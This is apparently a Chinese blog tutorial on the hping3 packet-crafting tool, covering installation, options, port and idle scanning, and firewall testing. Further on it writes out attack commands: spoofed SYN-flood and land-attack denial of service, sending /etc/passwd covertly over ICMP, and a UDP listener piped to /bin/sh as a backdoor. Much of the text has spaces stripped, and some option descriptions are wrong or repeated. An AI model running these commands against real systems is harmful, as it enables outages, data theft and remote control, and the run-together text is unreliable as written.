Linux中hping3命令有什么用
這篇文章將為大家詳細講解有關Linux中hping3命令有什么用,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
Linux常用命令hping 是用于生成和解析TCPIP協議數據包的開源工具。創作者是Salvatore Sanfilippo。目前最新版是hping3,支持使用tcl腳本自動化地調用其API。
hping3
測試網絡及主機的安全
補充說明
hping是安全審計、防火墻測試等工作的標配工具。hping優勢在于能夠定制數據包的各個部分,因此用戶可以靈活對目標機進行細致地探測。
安裝
yuminstalllibpcap-develtc-develln-s/usr/include/pcap-bpf.h/usr/include/net/bpf.hwgethttp://www.hping.org/hping3-20051105.tar.gztarzxvfhping3-20051105.tar.gzcdhping3-20051105./configuremakemakeinstall
選項
-H--help顯示幫助。-v-VERSION版本信息。-c--countcount發送數據包的次數關于countreached_timeout可以在hping2.h里編輯。-i--interval包發送間隔時間(單位是毫秒)缺省時間是1秒,此功能在增加傳輸率上很重要,在idle/spoofing掃描時此功能也會被用到,你可以參考hping-howto獲得更多信息-fast每秒發10個數據包。-n-nmeric數字輸出,象征性輸出主機地址。-q-quiet退出。-I--interfaceinterfacename無非就是eth0之類的參數。-v--verbose顯示很多信息,TCP回應一般如:len=46ip=192.168.1.1flags=RADFseq=0ttl=255id=0win=0rtt=0.4mstos=0iplen=40seq=0ack=1380893504sum=2010urp=0-D--debug進入debug模式當你遇到麻煩時,比如用HPING遇到一些不合你習慣的時候,你可以用此模式修改HPING,(INTERFACEDETECTION,DATALINKLAYERACCESS,INTERFACESETTINGS,.......)-z--bind快捷鍵的使用。-Z--unbind消除快捷鍵。-O--rawipRAWIP模式,在此模式下HPING會發送帶數據的IP頭。-1--icmpICMP模式,此模式下HPING會發送IGMP應答報,你可以用--ICMPTYPE--ICMPCODE選項發送其他類型/模式的ICMP報文。-2--udpUDP模式,缺省下,HPING會發送UDP報文到主機的0端口,你可以用--baseport--destport--keep選項指定其模式。-9--listensignatuerhping的listen模式,用此模式,HPING會接收指定的數據。-a--spoofhostname偽造IP攻擊,防火墻就不會記錄你的真實IP了,當然回應的包你也接收不到了。-t--ttltimetolive可以指定發出包的TTL值。-H--ipproto在RAWIP模式里選擇IP協議。-w--WINIDUNIX,WINDIWS的id回應不同的,這選項可以讓你的ID回應和WINDOWS一樣。-r--rel更改ID的,可以讓ID曾遞減輸出,詳見HPING-HOWTO。-F--FRAG更改包的FRAG,這可以測試對方對于包碎片的處理能力,缺省的“virtualmtu”是16字節。-x--morefrag此功能可以發送碎片使主機忙于恢復碎片而造成主機的拒絕服務。-y-dontfrag發送不可恢復的IP碎片,這可以讓你了解更多的MTUPATHDISCOVERY。-G--fragofffragmentoffsetvaluesetthefragmentoffset-m--mtumtuvalue用此項后ID數值變得很大,50000沒指定此項時3000-20000左右。-G--rroute記錄路由,可以看到詳悉的數據等等,最多可以經過9個路由,即使主機屏蔽了ICMP報文。-C--ICMPTYPEtype指定ICMP類型,缺省是ICMPechoREQUEST。-K--ICMPCODECODE指定ICMP代號,缺省0。--icmp-ipver把IP版本也插入IP頭。--icmp-iphlen設置IP頭的長度,缺省為5(32字節)。--icmp-iplen設置IP包長度。--icmp-ipid設置ICMP報文IP頭的ID,缺省是RANDOM。--icmp-ipproto設置協議的,缺省是TCP。-icmp-cksum設置校驗和。-icmp-tsaliasfor--icmptype13(tosendICMPtimestamprequests)--icmp-addrAliasfor--icmptype17(tosendICMPaddressmaskrequests)-s--baseportsourceporthping用源端口猜測回應的包,它從一個基本端口計數,每收一個包,端口也加1,這規則你可以自己定義。-p--deskport[+][+]deskport設置目標端口,缺省為0,一個加號設置為:每發送一個請求包到達后,端口加1,兩個加號為:每發一個包,端口數加1。--keep上面說過了。-w--win發的大小和windows一樣大,64BYTE。-O--tcpoffSetfaketcpdataoffset.Normaldataoffsetistcphdrlen/4.-m--tcpseq設置TCP序列數。-l--tcpck設置TCPack。-Q--seqnum搜集序列號的,這對于你分析TCP序列號有很大作用。
Hping3功能
Hping3主要有以下典型功能應用:
# 防火墻測試
使用Hping3指定各種數據包字段,依次對防火墻進行詳細測試。請參考:http://0daysecurity.com/articles/hping3_examples.html
測試防火墻對ICMP包的反應、是否支持traceroute、是否開放某個端口、對防火墻進行拒絕服務攻擊(DoS attack)。例如,以LandAttack方式測試目標防火墻(Land Attack是將發送源地址設置為與目標地址相同,誘使目標機與自己不停地建立連接)。
hping3-S-c1000000-a10.10.10.10-p2110.10.10.10
# 端口掃描
Hping3也可以對目標端口進行掃描。Hping3支持指定TCP各個標志位、長度等信息。以下示例可用于探測目標機的80端口是否開放:
hping3-Ieth0-S192.168.10.1-p80
其中-I eth0指定使用eth0端口,-S指定TCP包的標志位SYN,-p 80指定探測的目的端口。
hping3支持非常豐富的端口探測方式,nmap擁有的掃描方式hping3幾乎都支持(除開connect方式,因為Hping3僅發送與接收包,不會維護連接,所以不支持connect方式探測)。而且Hping3能夠對發送的探測進行更加精細的控制,方便用戶微調探測結果。當然,Hping3的端口掃描性能及綜合處理能力,無法與Nmap相比。一般使用它僅對少量主機的少量端口進行掃描。
# Idle掃描
Idle掃描(Idle Scanning)是一種匿名掃描遠程主機的方式,該方式也是有Hping3的作者Salvatore Sanfilippo發明的,目前Idle掃描在Nmap中也有實現。
該掃描原理是:尋找一臺idle主機(該主機沒有任何的網絡流量,并且IPID是逐個增長的),攻擊端主機先向idle主機發送探測包,從回復包中獲取其IPID。冒充idle主機的IP地址向遠程主機的端口發送SYN包(此處假設為SYN包),此時如果遠程主機的目的端口開放,那么會回復SYN/ACK,此時idle主機收到SYN/ACK后回復RST包。然后攻擊端主機再向idle主機發送探測包,獲取其IPID。那么對比兩次的IPID值,我們就可以判斷遠程主機是否回復了數據包,從而間接地推測其端口狀態。
# 拒絕服務攻擊
使用Hping3可以很方便構建拒絕服務攻擊。比如對目標機發起大量SYN連接,偽造源地址為192.168.10.99,并使用1000微秒的間隔發送各個SYN包。
hping3-Ieth0-a192.168.10.99-S192.168.10.33-p80-iu1000
其他攻擊如smurf、teardrop、land attack等也很容易構建出來。
# 文件傳輸
Hping3支持通過TCP/UDP/ICMP等包來進行文件傳輸。相當于借助TCP/UDP/ICMP包建立隱秘隧道通訊。實現方式是開啟監聽端口,對檢測到的簽名(簽名為用戶指定的字符串)的內容進行相應的解析。在接收端開啟服務:
hping3192.168.1.159--listensignature--safe--icmp
監聽ICMP包中的簽名,根據簽名解析出文件內容。
在發送端使用簽名打包的ICMP包發送文件:
hping3192.168.1.108--icmp?d100--signsignature--file/etc/passwd
將/etc/passwd密碼文件通過ICMP包傳給192.168.10.44主機。發送包大小為100字節(-d 100),發送簽名為signature(-sign signature)。
# 木馬功能
如果Hping3能夠在遠程主機上啟動,那么可以作為木馬程序啟動監聽端口,并在建立連接后打開shell通信。與netcat的后門功能類似。
示例:本地打開53號UDP端口(DNS解析服務)監聽來自192.168.10.66主機的包含簽名為signature的數據包,并將收到的數據調用/bin/sh執行。
在木馬啟動端:
hping3192.168.10.66--listensignature--safe--udp-p53|/bin/sh
在遠程控制端:
echols>test.cmdhping3192.168.10.44-p53-d100--udp--signsiganature--file./test.cmd
將包含ls命令的文件加上簽名signature發送到192.168.10.44主機的53號UDP端口,包數據長度為100字節。
當然這里只是簡單的演示程序,真實的場景,控制端可以利益shell執行很多的高級復雜的操作。
總結
以上是生活随笔為你收集整理的Linux中hping3命令有什么用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SAP Odata服务里filter的用
- 下一篇: 服务器中的带宽是如何测试的